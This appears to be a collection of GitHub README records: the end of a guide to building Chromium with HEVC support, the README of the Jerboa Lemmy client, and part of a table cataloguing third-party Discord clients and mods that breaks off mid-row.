doc](https://www.chromium.org/developers/how-tos/get-the-code/) to prepare the build environment then fetch the source code from `main` branch (HEVC HW codes has been merged). 2. (Optional) To enable HEVC software decoding: switch to `src/third_party/ffmpeg` dir, then execute `git am /path/to/add-hevc-ffmpeg-decoder-parser.patch`. If failed to apply the patch, could also try `node /path/to/add-hevc-ffmpeg-decoder-parser.js` to enable software decoding (Node.js is required to run the script), then switch to `src` dir, and execute `git am /path/to/enable-hevc-ffmpeg-decoding.patch`. 3. (Optional) To enable HEVC encoding support by default on Windows / macOS / Android, switch to `src` dir, then execute `git am /path/to/enable-hevc-encoding-by-default.patch`. 4. (Optional) To integrate Widevine CDM to support EME API (like Netflix): switch to `src` dir, then execute `cp -R /path/to/widevine/* third_party/widevine/cdm` (Windows: `xcopy /path/to/widevine third_party\widevine\cdm /E/H`). 5. If you are using `Mac` + want to build `x64` arch (target_cpu to `x86` , `arm64` , `arm` also available) + want to add CDM support, then run `gn gen out/Release64 --args="is_component_build = false is_official_build = true is_debug = false ffmpeg_branding = \"Chrome\" target_cpu = \"x64\" proprietary_codecs = true media_use_ffmpeg = true enable_widevine = true bundle_widevine_cdm = true"`, if you are using `Windows`, you need to add `enable_media_foundation_widevine_cdm = true` as well. 6. Run `autoninja -C out/Release64 chrome` to start the build. 7. Open Chromium directly. ## How to integrate this into Chromium based project like Electron? If Electron >= v22.0.0, the HEVC HW decoding feature for macOS, Windows, and Linux (VAAPI only) should have already been integrated. To add HEVC SW decoding, the method should be the same with Chromium guide above. ## Change Log `2024-05-30` Fixed issue of abnormal color when HEVC video encoded with GBR color space matrix (Chrome >= `127.0.6510.0`). `2024-04-18` Fixed issue of video frame stuttering on some AMD GPUs (Edge >= `124.0.2478.49`), and issue of bad HEVC Main10 HDR tone-mapping performance for Edge on Windows platform (Edge >= `125.0.2530.0`) `2024-04-09` Fixed issue where HEVC Rext 4:2:2/4:4:4 video chroma sampling was downgraded to 4:2:0 on Windows/macOS platforms (Chrome >= `125.0.6408.0`) `2024-03-28` Update Chromium 123 / 124 HDR related bug fixes detail, and the tech diff with Chrome for `Edge >= 122` `2023-12-22` Update implementation details and comparison with Firefox `2023-12-08` Improved Dolby Vision playback capabilities (Chrome >= `122.0.6168.0`) `2023-11-16` Support MV-HEVC Base Layer playback (Chrome >= `121.0.6131.0`) `2023-10-20` Fixed Winodows CRA/RASL image artifact issue when seeking (Chrome >= `120.0.6076.0`) `2023-10-10` Block Intel driver version between `20.19.15.4284` and `20.19.15.5172` that could cause HEVC playback crash (Chrome >= `120.0.6059.0`) `2023-10-02` Update HDR10/PQ support status for Edge 117 `2023-09-23` Fix 10bit video playback issues for AMD GPU on Windows platform (black screen when playing HLG video in SDR mode, 4K freezes, high memory usage, color change when switching full-screen, crash when playing SDR video in HDR mode, Chrome >= `119.0.6022.0`) `2023-08-21` Add HEVC Rext 8bit 422 support on Windows (Chrome >= `118.0.5956.0`) `2023-07-28` Fixed latency issue with WebCodecs VideoDecoder implementation for H265 on Windows (detail: https://github.com/w3c/webcodecs/issues/698, Chrome >= `117.0.5913.0`) `2023-07-20` Add HEVC HW WebCodecs encoding support for Android 10+ (Chrome >= `117.0.5899.0`) `2023-07-16` Apple Silicon + macOS 14 = adds HEVC SVC (L1T2) WebCodecs encoding support (Chrome >= `117.0.5891.0`) `2023-07-07` Fixed 8bit HDR HEVC playback failure issue under Windows (Chrome >= `117.0.5877.0`) `2023-07-02` Add HEVC Rext 8bit 444, 12bit 422, 12bit 444 support on Windows (Chrome >= `117.0.5866.0`) `2023-02-22` Android platform now able to use the support detection API to detect the correct support status of different devices (Chrome >= `112.0.5612.0`) `2023-02-17` Update Widevine L1 HEVC / Dolby Vision support detect method `2023-02-14` Android platform now allows H264 / HEVC / VP9 / AV1 to be played at the maximum resolution supported by the device. Previously all Codecs only supported the hard-coded 4K. Now as long as the device supports it, it can support 8K or even higher resolutions (Chrome > = `112.0.5594.0`) `2023-02-11` Allow invalid colorspace (primary, matrix, transfer) video to play instead of block the whole playback (Chrome >= `112.0.5589.0`) `2022-12-03` Fixed the incomplete SEI parsing logic, and supported the extraction of HDR Metadata both from the bitstream and container. This will solved the problem that some HDR10 videos could not extract static hdr metadata and guarantee the best HDR performance (Chrome >= `110.0.5456.0`) `2022-11-18` Fix a bug if D3D11VideoDecoder is disabled by gpu workaround, support detection API still report "supported" (M110, M109) `2022-11-03` Add macOS WebCodec HEVC encode support, decrease 50% GPU memory usage when playing HDR content on SDR screen on Windows, and improved HDR tone mapping color accuracy on Windows as well `2022-10-28` Edge (Mac) >= 107 enable by default `2022-10-25` Chrome >= 107 enable by default + Windows WebCodec Encode support `2022-10-11` Add Linux HEVC HW decoding support (Chrome >= `108.0.5354.0`) `2022-10-09` HEVC with alpha (macOS only) support decoding with WebCodec API and preserve it's alpha layer `2022-10-08` Add HDR10 Metadata extract logic, support WebCodec >= 10bits `2022-09-26` Add a SW decoding auto-gen patch script `2022-09-15` Fix crash for Intel 11/12 Gen iGPU when play HDR video in system HDR mode, improve the accuracy of MediaCapabilities API, Update Patch to `107.0.5303.0` `2022-09-14` Chrome Canary >= `107.0.5300.0` has enabled HEVC HW decoder by default, official version will be available after `2022-10-25` `2022-09-08` Guarantee the detection API's result (Chrome >= `107.0.5288.0`), and update the detection methods `2022-08-31` Add WebCodec API (8bit only) support, and HEVC with alpha layer support (macOS only) `2022-08-06` Update usage to Edge (Mac) 104 release version `2022-08-02` Update usage to Chrome 104 release version `2022-08-01` Add Chrome / Edge Usage `2022-07-31` Intel GPU support HEVC Rext Profile hw decoding on Windows, Update Patch to `106.0.5211.0` `2022-07-15` Update Electron v20.0.0-beta.9 and above version support status `2022-06-21` Update Microsoft Edge (Mac) feature test guide `2022-06-18` Fix HLG/PQ tone mapping, and update Patch to `105.0.5127.0` `2022-06-17` Remove Linux support, Update Other Platform and HDR support status `2022-05-26` Update Chrome Canary HEVC feature test guide `2022-05-25` Update Chrome 104 support status, and Electron 20 enable method `2022-05-24` Update Patch to `104.0.5080.1` `2022-05-23` Add CDM compile guide, and update Patch to `104.0.5077.1` `2022-05-17` Update detail of tech implement and guide to integrate into electron `2022-05-14` Update Patch to `104.0.5061.1` `2022-05-13` Add HEVC Test page `2022-05-10` Update README, add more special detail of the hardware support and GPU models `2022-05-05` Add support for MSP & Rext on macOS, and fix the issue that some HDR & Rec.709 Main10 video can't be hw decoded on Windows `2022-04-27` Replace to `git am` patch `2022-04-24` Support chinese README `2022-04-21` Add Crbug trace `2022-04-20` Modify README `2022-04-19` Initial commit ## Trace Crbug ##### [Windows](https://crbug.com/1286132) ##### [macOS](https://crbug.com/1300444) ## License MIT
A guide that teach you enable hardware HEVC decoding & encoding for Chrome / Edge, or build a custom version of Chromium / Electron that supports hardware & software HEVC decoding and hardware HEVC encoding.
chrome,hevc,hardware-decode,electron
13
2
1
103
7
1
0
LemmyNet/jerboa
<div align="center"> ![GitHub tag (latest SemVer)](https://img.shields.io/github/tag/LemmyNet/jerboa.svg) [![status-badge](https://woodpecker.join-lemmy.org/api/badges/LemmyNet/jerboa/status.svg)](https://woodpecker.join-lemmy.org/LemmyNet/jerboa) [![GitHub issues](https://img.shields.io/github/issues-raw/LemmyNet/jerboa.svg)](https://github.com/LemmyNet/jerboa/issues) [![License](https://img.shields.io/github/license/LemmyNet/jerboa.svg)](LICENSE) ![GitHub stars](https://img.shields.io/github/stars/LemmyNet/jerboa?style=social) </div> <p align="center"> <a href="https://github.com/LemmyNet/jerboa" rel="noopener"> <img width=200px height=200px src="https://raw.githubusercontent.com/LemmyNet/jerboa/main/app/src/main/res/jerboa.svg"></a> <h3 align="center"><a href="https://github.com/LemmyNet/jerboa">Jerboa</a></h3> <p align="center"> An Android client for <a href="https://github.com/LemmyNet/lemmy">Lemmy</a>, a federated reddit alternative <br /> <br /> <a href="https://join-lemmy.org">Join Lemmy</a> ยท <a href="https://github.com/LemmyNet/jerboa/issues">Report Bug</a> ยท <a href="https://github.com/LemmyNet/jerboa/issues">Request Feature</a> ยท <a href="https://github.com/LemmyNet/jerboa/blob/main/RELEASES.md">Releases</a> </p> <p align="center"> <a href="https://apt.izzysoft.de/fdroid/index/apk/com.jerboa"><img src="https://gitlab.com/IzzyOnDroid/repo/-/raw/master/assets/IzzyOnDroid.png" alt="Get it on IzzyOnDroid" height="80"></a> <a href="https://f-droid.org/packages/com.jerboa"><img src="https://fdroid.gitlab.io/artwork/badge/get-it-on.png" alt="Get it on F-Droid" height="80"></a> <a href="https://play.google.com/store/apps/details?id=com.jerboa"><img src="https://cdn.rawgit.com/steverichey/google-play-badge-svg/master/img/en_get.svg" height="80"></a> <a href="https://github.com/LemmyNet/jerboa/releases/latest"><img src="https://raw.githubusercontent.com/andOTP/andOTP/master/assets/badges/get-it-on-github.png" height="80"></a> </p> </p> ## About Jerboa | Homepage | Post & Comments | | -------------------------------------------------------------------------- | ------------------------------------------------------------------------ | | ![img_1](./fastlane/metadata/android/en-US/images/phoneScreenshots/01.png) | ![img_2](fastlane/metadata/android/en-US/images/phoneScreenshots/02.png) | Jerboa is a native-android client for Lemmy, built using the native Android Toolkit, Jetpack Compose. **Warning**: You can submit issues, but between Lemmy and lemmy-ui, I probably won't have too much time to work on them. Learn jetpack compose like I did if you want to help make this app better. ### Built With - [Android Jetpack Compose](https://developer.android.com/jetpack/compose) - [Kotlin](https://kotlinlang.org/) - [Retrofit](https://square.github.io/retrofit/) ## Features - Open source, [AGPL License](/LICENSE). ## Installation / Releases - [Releases](https://github.com/LemmyNet/jerboa/releases) - [IzzyOnDroid](https://apt.izzysoft.de/fdroid/index/apk/com.jerboa) - [F-Droid](https://f-droid.org/en/packages/com.jerboa/) - [Google Play](https://play.google.com/store/apps/details?id=com.jerboa) ## Support / Donate Jerboa is made by Lemmy's developers, and is free, open-source software, meaning no advertising, monetizing, or venture capital, ever. Your donations directly support full-time development of the project. Jerboa and Lemmy are made possible by a generous grant from the [NLnet foundation](https://nlnet.nl/). - [Support on Liberapay](https://liberapay.com/Lemmy). - [Support on OpenCollective](https://opencollective.com/lemmy). - [Support on Patreon](https://www.patreon.com/dessalines). - [List of Sponsors](https://join-lemmy.org/donate). ### Crypto - bitcoin: `1Hefs7miXS5ff5Ck5xvmjKjXf5242KzRtK` - ethereum: `0x400c96c96acbC6E7B3B43B1dc1BB446540a88A01` - monero: `41taVyY6e1xApqKyMVDRVxJ76sPkfZhALLTjRvVKpaAh2pBd4wv9RgYj1tSPrx8wc6iE1uWUfjtQdTmTy2FGMeChGVKPQuV` ## Contact - [Mastodon](https://mastodon.social/@LemmyDev) - [Jerboa dev chat](https://matrix.to/#/#jerboa-dev:matrix.org) - [Lemmy chat](https://matrix.to/#/#lemmy:matrix.org) ## Credits Icons made by [Freepik](https://www.freepik.com) from [www.flaticon.com](https://www.flaticon.com).
A native android app for Lemmy
activitypub,android,android-application,lemmy,link-aggregator,mobile-app
63
97
722
916
104
224
0
Discord-Client-Encyclopedia-Management/Discord3rdparties
# Discord Client Encyclopedia <p align="center"> <a href="https://discord.gg/3kv5yzTYQE"> <img alt="Discord" src="https://img.shields.io/discord/1044501553731600414?color=%7767d2&label=Support%20Server&logo=discord&logoColor=%cd67d2&style=for-the-badge"> </a> </p> <p align="center"> <img alt="GitHub Repo stars" src="https://img.shields.io/github/stars/Discord-Client-Encyclopedia-Management/Discord3rdparties?color=ec9c36&logo=github&style=for-the-badge"> <img alt="GitHub forks" src="https://img.shields.io/github/forks/Discord-Client-Encyclopedia-Management/Discord3rdparties?color=ec365a&logo=github&style=for-the-badge"> <a href="https://github.com/Discord-Client-Encyclopedia-Management/Discord3rdparties/blob/main/LICENSE"> <img alt="License" src="https://img.shields.io/github/license/Discord-Client-Encyclopedia-Management/Discord3rdparties?style=for-the-badge"> </a> </p> A non-exhaustive collection of third-party clients and mods for Discord. ## Table of Contents - [Discord Client Encyclopedia](#discord-client-encyclopedia) - [Table of Contents](#table-of-contents) - [Mobile](#mobile) - [Android Clients \& Mods](#android-clients--mods) - [iOS Clients \& Mods](#ios-clients--mods) - [Desktop](#desktop) - [Official Clients](#official-clients) - [Mods](#mods) - [Plugin bundlers](#plugin-bundlers) - [Third-Party Reimplementations](#third-party-reimplementations) - [Console clients](#console-clients) - [Other clients](#other-clients) - [Third party server implementations](#third-party-server-implementations) - [Contributing](#contributing) - [Further comments](#further-comments) - [Disclaimer](#disclaimer) ## Mobile ### Android Clients & Mods | Name | Features | Language(s) | Development Status | | :---: | :---: | :---: | :---: | | [Discord Android](https://play.google.com/store/apps/details?id=com.discord&fingerprint=1129189278619021403._iqMp85lJ8wwcey3i6XvuHeKLYA&attemptId=a267ef68-ca9f-435f-99a6-f6a11875cf6c) | Official Android client | [Closed source] | ๐ŸŸข Active | | [Aliucord](https://github.com/Aliucord/Aliucord) | A modification for the Android Discord app | [![Java][Java-Badge]][Java-Url] [![Kotlin][Kotlin-Badge]][Kotlin-Url] [![Dart][Dart-Badge]][Dart-Url] | ๐Ÿ”ต Active *(Out of date[^1]\)* | | [Bunny](https://github.com/pyoncord/Bunny) | A mod for Discord's mobile apps, fork of Vendetta. | [![TypeScript][TypeScript-Badge]][TypeScript-Url] | ๐ŸŸข Active | | [VendroidEnhanced](https://github.com/VendroidEnhanced/Vendroid) | VendroidEnhanced is a fork of [Vencord/Vendroid](https://github.com/Vencord/Android) that improves upon the original project. | [![Kotlin][Kotlin-Badge]][Kotlin-Url] [![JavaScript][JavaScript-Badge]][JavaScript-Url] | ๐ŸŸข Active | | [Vendroid](https://github.com/Vencord/Vendroid) | Vencord for Android! A WebView embedding the Discord site, loading Vencord and adding some goodies. | [![Java][Java-Badge]][Java-Url] [![JavaScript][JavaScript-Badge]][JavaScript-Url] | ๐ŸŸข Active | | [Revenge](https://github.com/revenge-mod/Revenge) | A modification for Discord mobile apps. | [![TypeScript][TypeScript-Badge]][TypeScript-Url] | ๐Ÿ”ด Discontinued | | [Vendetta](https://github.com/vendetta-mod/Vendetta) | A Discord mod that is compatible with Android and iOS! | [![TypeScript][TypeScript-Badge]][TypeScript-Url] | ๐Ÿ”ด Discontinued | | [CutTheCord](https://gitdab.com/distok/cutthecord) | Modular Client Mod for Discord's Android app. | [![Python][Python-Badge]][Python-Url] [![Java][Java-Badge]][Java-Url] | ๐Ÿ”ด Discontinued | | [OpenCord](https://github.com/X1nto/OpenCord) | An open-source implementation of the Discord Android app | [![Kotlin][Kotlin-Badge]][Kotlin-Url] | ๐Ÿ”ด Discontinued | | [OpenCord ACTIVE EDITION](https://github.com/topminipie/OpenCord) | An open-source implementation of the Discord Android app | [![Kotlin][Kotlin-Badge]][Kotlin-Url] | ๐ŸŸข Active | | [Treecord](https://github.com/Treecord/Treecord) | A modded Discord client for Android! | [![Shell Script][Shell Script-Badge]][Shell Script-Url] | ๐Ÿ”ด Discontinued | | Bluecord | Modded client mod for Android | [Closed source] | โ›” Malware (scams and spying) | ### iOS Clients & Mods | Name | Features | Language(s) | Development Status | | :---: | :---: | :---: | :---: | | [Discord iOS](https://apps.apple.com/us/app/discord-chat-talk-hangout/id985746746) | Official iOS client | [Closed source] | ๐ŸŸข Active | | [Enmity](https://enmity.unbound.rip/) | The power of addons, all in your hand. | [![TypeScript][TypeScript-Badge]][TypeScript-Url] | ๐ŸŸข Active | | [Bunny](https://github.com/pyoncord/Bunny) | A mod for Discord's mobile apps, fork of Vendetta. | [![TypeScript][TypeScript-Badge]][TypeScript-Url] | ๐ŸŸข Active | | [Revenge](https://github.com/revenge-mod/Revenge) | A modification for Discord mobile apps. | [![TypeScript][TypeScript-Badge]][TypeScript-Url] | ๐Ÿ”ด Discontinued | | [Vendetta](https://github.com/vendetta-mod/Vendetta) | A Discord mod that is compatible with Android and iOS! | [![TypeScript][TypeScript-Badge]][TypeScript-Url] | ๐Ÿ”ด Discontinued | | [Discord Classic](https://github.com/cellomonster/iOS-Discord-Classic) | A bare-bones Discord client for iOS 5 and 6. | [![Objective-C][Objective-C-Badge]][Objective-C-Url] | ๐Ÿ”ด Discontinued | ## Desktop ### Official Clients | Name | Link | Infos | | :---: | :---: | :---: | | [Discord](https://discord.com) | [Web](https://discord.com/app), [Windows](https://discord.com/api/download/stable?platform=win), [macOS](https://discord.com/api/download/stable?platform=osx), [Debian/Ubuntu](https://discord.com/api/download/stable?platform=linux), [Tarball](https://discord.com/api/download/stable?platform=linux&format=tar.gz) | Main software | | [Discord PTB](https://ptb.discord.com) | [Web](https://ptb.discord.com/app), [Windows](https://discord.com/api/download/ptb?platform=win), [macOS](https://discord.com/api/download/ptb?platform=osx), [Debian/Ubuntu](https://discord.com/api/download/ptb?platform=linux), [Tarball](https://discord.com/api/download/ptb?platform=linux&format=tar.gz) | Public Test Build | | [Discord Canary](https://canary.discord.com) | [Web](https://canary.discord.com/app), [Windows](https://discord.com/api/download/canary?platform=win), [macOS](https://discord.com/api/download/canary?platform=osx), [Debian/Ubuntu](https://discord.com/api/download/canary?platform=linux), [Tarball](https://discord.com/api/download/canary?platform=linux&format=tar.gz) | Discord's [canary build](https://semaphoreci.com/blog/what-is-canary-deployment), releases features earlier than PTB | | Discord Development | [Windows](https://discord.com/api/download/development?platform=win), [macOS](https://discord.com/api/download/development?platform=osx), [Debian/Ubuntu](https://discord.com/api/download/development?platform=linux), [Tarball](https://discord.com/api/download/development?platform=linux&format=tar.gz) | Essentially Discord's canary build but with updates a few days earlier | ### Mods | Name | Features | Language(s) | Development Status | | :---: | :---: | :---: | :---: | | [Aero](https://github.com/aero-mod/aero) | A next-generation Discord mod empowering users and developers alike. | [![TypeScript][TypeScript-Badge]][TypeScript-Url] | ๐ŸŸข Active | | [BeautifulDiscord](https://github.com/leovoel/BeautifulDiscord) | Simple Python script that adds CSS hot-reload to Discord. | [![Python][Python-Badge]][Python-Url] | ๐ŸŸข Active | | [BetterDiscord](https://betterdiscord.app/) | BetterDiscord extends the functionality of DiscordApp by enhancing it with new features. | [![JavaScript][JavaScript-Badge]][JavaScript-Url] | ๐ŸŸข Active | | [DiscoCSS](https://github.com/mlvzk/discocss) | A tiny Discord CSS injector for Linux and Mac OS. | [![Shell Script][Shell Script-Badge]][Shell Script-Url] | ๐ŸŸข Active | | [Kernel](https://github.com/kernel-mod) | A super small and fast Electron client mod with the most capability. | [![TypeScript][TypeScript-Badge]][TypeScript-Url] | ๐ŸŸข Active | | [OpenAsar](https://openasar.dev/) | Alternative `app.asar` for Discord. Makes your client feel snappier. | [![JavaScript][JavaScript-Badge]][JavaScript-Url] [![Nim][Nim-Badge]][Nim-Url] | ๐ŸŸข Active | | [Replugged](https://replugged.dev) | A lightweight Discord client mod focused on simplicity and performance. | [![TypeScript][TypeScript-Badge]][TypeScript-Url] | ๐ŸŸข Active | | [shelter](https://github.com/uwu/shelter) | shelter is a new generation client mod built to be essentially bulletproof (i.e. Discord switch to SWC). | [![TypeScript][TypeScript-Badge]][TypeScript-Url] | ๐ŸŸข Active | | [Vencord](https://github.com/Vendicated/Vencord) | Proper context isolation, inline patches, Custom CSS, Usefulโ„ข plugins | [![TypeScript][TypeScript-Badge]][TypeScript-Url] | ๐ŸŸข Active | | [Vesktop](https://github.com/Vencord/Vesktop) | Vesktop is a cross platform desktop app aiming to give you a snappier Discord experience with Vencord pre-installed | [![TypeScript][TypeScript-Badge]][TypeScript-Url] | ๐ŸŸข Active | | [Cumcord](https://github.com/Cumcord/Cumcord) | Cumcord is a Discord client mod that focuses on making the Discord plugin development experience easier. | [![JavaScript][JavaScript-Badge]][JavaScript-Url] | ๐ŸŸข Active | | [Vizality](https://vizality.com/) | An Discord app client modification, allowing for a truly customizable experience through the use of plugins, themes, and built-in settings. *Runs on web browsers too* | [![JavaScript][JavaScript-Badge]][JavaScript-Url] | ๐Ÿ”ด Discontinued | | [Hykord](https://github.com/xHyroM/hykord) | xHyroM's @discord client modification. Supports BD themes and is working on BD and PC/RP plugin support. | [![TypeScript][TypeScript-Badge]][TypeScript-Url] [![Zig][Zig-Badge]][Zig-Url] [![JavaScript][JavaScript-Badge]][JavaScript-Url] | ๐Ÿ”ด Discontinued | | [Crycord](https://crycord.geopjr.dev/) | A Discord Client modification with plugins. Uses BeautifulDiscord's CSS injector. Oh it's also written in Crystal! | [![Crystal][Crystal-Badge]][Crystal-Url] | ๐ŸŸ  On hiatus, since May 2021 | | [Demoncord](https://git.ruthenic.com/Demon/demoncord-rewrite) | A Discord client mod by satanists, for satanists. |[![JavaScript][JavaScript-Badge]][JavaScript-Url] | ๐ŸŸ  On hiatus, since September 2022 | | [EnhancedDiscord](https://github.com/joe27g/EnhancedDiscord) | A lightweight Discord client mod. | [![JavaScript][JavaScript-Badge]][JavaScript-Url] | ๐Ÿ”ด Abandoned | | Acord Premium | A client you have to pay for that stole its code. | [Closed source] | โ›” sus behavior (Stolen code) | | [GooseMod](https://goosemod.com/) | GooseMod is a new, store-driven Discord mod. *Runs on web browsers too* | [![JavaScript][JavaScript-Badge]][JavaScript-Url] | ๐Ÿ”ด Discontinued | | [HolyMod](https://github.com/HolyMod/HolyMod) | A lightweight client mod focused on simplicity and performance. | [![TypeScript][TypeScript-Badge]][TypeScript-Url] | ๐Ÿ”ด Discontinued | | [Lightcord](https://github.com/Lightcord/Lightcord) | Lightcord is a simple and customizable client for Discord. It includes BandagedBD, Glasstron and a discord.js-like api. | [![JavaScript][JavaScript-Badge]][JavaScript-Url] [![TypeScript][TypeScript-Badge]][TypeScript-Url] | ๐Ÿ”ด Discontinued, and abandoned | | [Powercord](https://powercord.dev/) | A lightweight Discord client mod focused on simplicity and performance. | [![JavaScript][JavaScript-Badge]][JavaScript-Url] [![TypeScript][TypeScript-Badge]][TypeScript-Url] | ๐Ÿ”ด Discontinued | | [Topaz](https://topaz.goosemod.com/) | Topaz is an upcoming mod which aims to be "next-gen" by using advanced tech to add never-before-seen innovative features. *Runs on web browsers too* | [![JavaScript][JavaScript-Badge]][JavaScript-Url] | ๐Ÿ”ด Discontinued | | [Velocity](https://github.com/Velocity-Discord/Velocity) | Velocity is a Discord Client modification that allows you to extend discord's functionality and capabilities. | [![JavaScript][JavaScript-Badge]][JavaScript-Url] | ๐Ÿ”ด Discontinued | #### Plugin bundlers | Name | Features | Language(s) | Development Status | | :---: | :---: | :---: | :---: | | [Ittai (AAGaming's fork)](https://git.catvibers.me/Ittai/ittai) | Fork of Ittai that can bundle plugins to BetterDiscord, Powercord and Goosemod, making a plugin cross-platform. | [![JavaScript][JavaScript-Badge]][JavaScript-Url] [![TypeScript][TypeScript-Badge]][TypeScript-Url] | ๐Ÿ”ด Discontinued | | [Ittai (Original)](https://github.com/Kyza/ittai) | Bundler for BetterDiscord, Powercord and Goosemod, making a plugin cross-platform. | [![JavaScript][JavaScript-Badge]][JavaScript-Url] | ๐Ÿ”ด Discontinued | | [BetterDiscordBuilder](https://github.com/BetterDiscordBuilder/bdbuilder) | Simplified plugin bundler for BetterDiscord. Supports JSX/TSX and TypeScript | [![JavaScript][JavaScript-Badge]][JavaScript-Url] [![TypeScript][TypeScript-Badge]][TypeScript-Url] | ๐Ÿ”ด Discontinued | ### Third-Party Reimplementations | Name | Features | Language(s) | Development Status | | :---: | :---: | :---: | :---: | | [Abaddon](https://github.com/uowuo/abaddon) | Alternative Discord client made in C++ with GTK | [![C++][C++-Badge]][C++-Url] | ๐ŸŸข Active | | [LibreDiscord](https://gitlab.com/zipdox/librediscord/-/tree/master?ref_type=heads) | LibreDiscord is a free and open source voice and video client for Discord written in C using GTK3 and GLib. | [![C++][C++-Badge]][C++-Url] | ๐ŸŸ  On hiatus | | [Discord Messenger-DM](https://github.com/DiscordMessenger/dm) |Discord Messenger is a free Discord-compatible messaging client targeting both new and old Windows. | [![C++][C++-Badge]][C++-Url] | ๐ŸŸข Active | | [AeroChat](https://aerochat.live/) | A Discord client themed to look like WLM 09. | [![React][React-Badge]][React-Url] [![TypeScript][TypeScript-Badge]][TypeScript-Url]| ๐ŸŸข Active | | [Armcord](https://github.com/armcord/armcord) | ArmCord is a custom client designed to enhance your Discord experience while keeping everything lightweight. | [![TypeScript][TypeScript-Badge]][TypeScript-Url] | ๐ŸŸข Active | | [ChimeraCord](https://github.com/RoboChimera/ChimeraCord) | A functional but elegant unofficial Discord client for freeBSD, that aims for feature-parity with the official Discord client. | [![JavaScript][JavaScript-Badge]][JavaScript-Url] | ๐ŸŸข Active | | [Datcord](https://github.com/gamingdoom/datcord) | An open-source discord client using firefox. | [![JavaScript][JavaScript-Badge]][JavaScript-Url] | ๐ŸŸข Active | | [Discord-PWA](https://github.com/NeverDecaf/discord-PWA) | A wrapper for the Discord web client as a Progressive Web Application, for use with Chromium based browsers. | [![JavaScript][JavaScript-Badge]][JavaScript-Url] | ๐ŸŸข Active | | [Discord-Sandbox](https://github.com/khlam/discord-sandboxed) | Open-source Sandbox Discord client for the privacy-minded. Say NO to intrusive data collection. | [![JavaScript][JavaScript-Badge]][JavaScript-Url] | ๐ŸŸข Active | | [discord-screenaudio](https://github.com/maltejur/discord-screenaudio) | A custom Discord client that supports streaming with audio on Linux. | [![C++][C++-Badge]][C++-Url] [![JavaScript][JavaScript-Badge]][JavaScript-Url] | ๐ŸŸข Active | | [Discordo](https://github.com/ayntgl/discordo) | A lightweight, secure, and feature-rich Discord terminal client | [![Go][Go-Badge]][Go-Url] | ๐ŸŸข Active | | [Dorion](https://github.com/SpikeHD/Dorion) | Lightweight alternative Discord client with a smaller footprint and some fancy extensible features | [![Rust][Rust-Badge]][Rust-Url] [![JavaScript][JavaScript-Badge]][JavaScript-Url] | ๐ŸŸข Active | | [FeatherCord](https://github.com/OfficiallySp/FeatherCord) | FeatherCord is a lightweight alternative to the Discord client and uses up to 25% less resources compared to the default desktop client. | [Closed source] | ๐Ÿ”ด Discontinued | | [GoofCord](https://github.com/Milkshiift/GoofCord) | A privacy-focused client with features like message encryption, script loading, and more. Based on ArmCord. | [![TypeScript][TypeScript-Badge]][TypeScript-Url] | ๐ŸŸข Active | | [Dissent](https://github.com/diamondburned/dissent) | Dissent (previously gtkcord4) is a third-party Discord client designed for a smooth, native experience on Linux desktops. | [![Go][Go-Badge]][Go-Url] | ๐ŸŸข Active | | [LemonCord](https://github.com/japandotorg/LemonCord) | A fast & light weight Discord Client made with love using the Rust programming language. | [![Rust][Rust-Badge]][Rust-Url] | ๐ŸŸข Active | | [QTCord](https://github.com/mak448a/QTCord/) | A lightweight Discord client written in Python and QT aiming for a native look and feel. | [![Python][Python-Badge]][Python-Url] | ๐ŸŸข Active | | [RyU](https://github.com/Muunatic/RyU) | Powerful Discord Client written in JavaScript. Lightweight, Efficient, Feature-rich. | [![JavaScript][JavaScript-Badge]][JavaScript-Url] | ๐ŸŸข Active | | [Swiftcord](https://github.com/cryptoAlgorithm/Swiftcord) | A completely native Discord client for macOS built 100% in Swift and SwiftUI! | [![Swift][Swift-Badge]][Swift-Url] | ๐ŸŸข Active | | [WebCord](https://github.com/SpacingBat3/WebCord) | A Discord API-less client made with Electron | [![TypeScript][TypeScript-Badge]][TypeScript-Url] | ๐Ÿ”ต Active *(Variable[^2]\)* | | [Spacebar Chat](https://spacebar.chat/) | Open source, themeable and extendable discord-compatible native Spacebar client | [![TypeScript][TypeScript-Badge]][TypeScript-Url] | ๐ŸŸข Active | | [Discord Tauri](https://github.com/DiscordTauri/discord-tauri) |A lightweight Discord wrapper made in Tauri | [![Rust][Rust-Badge]][Rust-Url] | ๐Ÿ”ด Discontinued | | [Disrust](https://github.com/DvorakDwarf/disrust) | A discord TUI client written entirely in Rust | [![Rust][Rust-Badge]][Rust-Url] | ๐ŸŸ  On hiatus, since January 2023 | | [Accord](https://github.com/evelyneee/accord) | Client for modern Macs | [![Swift][Swift-Badge]][Swift-Url] | ๐ŸŸ  On hiatus, since December 2022 | | [Unicord](https://github.com/UnicordDev/Unicord) | Discord Client for Windows 10 and Windows 10 Mobile | [![C#][C#-Badge]][C#-Url] | ๐ŸŸ  On hiatus, since April 2022 | | [NativeCord](https://github.com/andre4ik3/NativeCord) | SSB (site-specific browser) for Discord. In other words, all it does is load Discord as a website... in an app. | [![Swift][Swift-Badge]][Swift-Url] | ๐ŸŸ  On hiatus, since March 2022 | | [Unofficial-discord-client](https://github.com/Coding-Bunker/unofficial-discord-client) | Unofficial client for discord build in C++ with Qt. | [![C++][C++-Badge]][C++-Url] | ๐ŸŸ  On hiatus, since March 2022 | | [ToastCord](https://github.com/Traumatism/ToastCord) | Discord Terminal UI made in Python 3 | [![Python][Python-Badge]][Python-Url] | ๐Ÿ”ด Discontinued | | [Discord Lite](https://github.com/dosdude1/discord-lite) | An ultra-lightweight native Discord client for vintage and modern MacOS | [![Objective-C][Objective-C-Badge]][Objective-C-Url] | ๐ŸŸ  On hiatus, since January 2022 | | [Mirdorph](https://gitlab.gnome.org/ranchester/mirdorph) | A crappy low feature Discord Client using libadwaita | [![Python][Python-Badge]][Python-Url] | ๐Ÿ”ด Discontinued | | [Ripcord](https://cancel.fm/ripcord/) | Alternative desktop chat client for Slack (and Discord) designed for power users. | [Closed source] | ๐ŸŸ  On hiatus, since July 2021 | | [DiscordQt](https://github.com/ruslang02/discord-qt) | A Discord desktop client powered by Node.JS and NodeGui. | [![TypeScript][TypeScript-Badge]][TypeScript-Url] | ๐Ÿ”ด Discontinued | | [concord](https://github.com/volatide/concord) | Discord client made in Qt5 | [![Python][Python-Badge]][Python-Url] | ๐Ÿ”ด Discontinued | | [protocord](https://github.com/diamondburned/protocord) | A prototype CLI for a tiny Discord client. | [![Go][Go-Badge]][Go-Url] | ๐Ÿ”ด Discontinued | | [Pesterchum-Discord](https://github.com/henry232323/Pesterchum-Discord) | A Discord client mimicking the Pesterchum chat client from Homestuck, for the few people who are still interested in that. | [![Python][Python-Badge]][Python-Url] | 